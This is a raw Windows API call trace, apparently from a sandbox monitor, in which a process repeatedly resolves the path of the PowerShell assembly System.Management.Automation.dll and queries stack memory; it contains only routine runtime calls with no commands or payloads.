	[0062.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.694] GetLastError () returned 0x0
	[0062.694] VirtualQuery (in: lpAddress=0xad3f4, lpBuffer=0xae3f4, dwLength=0x1c | out: lpBuffer=0xae3f4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.695] GetLastError () returned 0x0
	[0062.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.696] GetLastError () returned 0x0
	[0062.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.696] GetLastError () returned 0x0
	[0062.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.696] GetLastError () returned 0x0
	[0062.696] VirtualQuery (in: lpAddress=0xad3f4, lpBuffer=0xae3f4, dwLength=0x1c | out: lpBuffer=0xae3f4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.696] GetLastError () returned 0x0
	[0062.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.696] GetLastError () returned 0x0
	[0062.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.696] GetLastError () returned 0x0
	[0062.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.697] GetLastError () returned 0x0
	[0062.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.697] GetLastError () returned 0x0
	[0062.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.697] GetLastError () returned 0x0
	[0062.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.698] GetLastError () returned 0x0
	[0062.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.698] GetLastError () returned 0x0
	[0062.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.698] GetLastError () returned 0x0
	[0062.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.698] GetLastError () returned 0x0
	[0062.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.698] GetLastError () returned 0x0
	[0062.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.698] GetLastError () returned 0x0
	[0062.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.698] GetLastError () returned 0x0
	[0062.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.698] GetLastError () returned 0x0
	[0062.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.698] GetLastError () returned 0x0
	[0062.698] VirtualQuery (in: lpAddress=0xad3f4, lpBuffer=0xae3f4, dwLength=0x1c | out: lpBuffer=0xae3f4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.699] GetLastError () returned 0x0
	[0062.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.699] GetLastError () returned 0x0
	[0062.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.699] GetLastError () returned 0x0
	[0062.699] VirtualQuery (in: lpAddress=0xad3f4, lpBuffer=0xae3f4, dwLength=0x1c | out: lpBuffer=0xae3f4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.699] GetLastError () returned 0x0
	[0062.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.699] GetLastError () returned 0x0
	[0062.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.699] GetLastError () returned 0x0
	[0062.700] VirtualQuery (in: lpAddress=0xad024, lpBuffer=0xae024, dwLength=0x1c | out: lpBuffer=0xae024*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.700] VirtualQuery (in: lpAddress=0xad060, lpBuffer=0xae060, dwLength=0x1c | out: lpBuffer=0xae060*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.700] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.700] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.701] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.701] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.701] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.701] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.702] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.702] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.702] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.702] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.702] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.703] VirtualQuery (in: lpAddress=0xad1cc, lpBuffer=0xae1cc, dwLength=0x1c | out: lpBuffer=0xae1cc*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.703] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.703] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.703] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.704] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.704] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x417352ab, Data2=0xd98e, Data3=0x4575, Data4=([0]=0x98, [1]=0x4f, [2]=0x77, [3]=0x7e, [4]=0x44, [5]=0x97, [6]=0x95, [7]=0xd5))) returned 0x0
	[0062.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.704] GetLastError () returned 0x0
	[0062.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.704] GetLastError () returned 0x0
	[0062.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.704] GetLastError () returned 0x0
	[0062.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.704] GetLastError () returned 0x0
	[0062.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.704] GetLastError () returned 0x0
	[0062.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.704] GetLastError () returned 0x0
	[0062.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.704] GetLastError () returned 0x0
	[0062.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
	[0062.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
	[0062.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
	[0062.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.705] GetLastError () returned 0x0
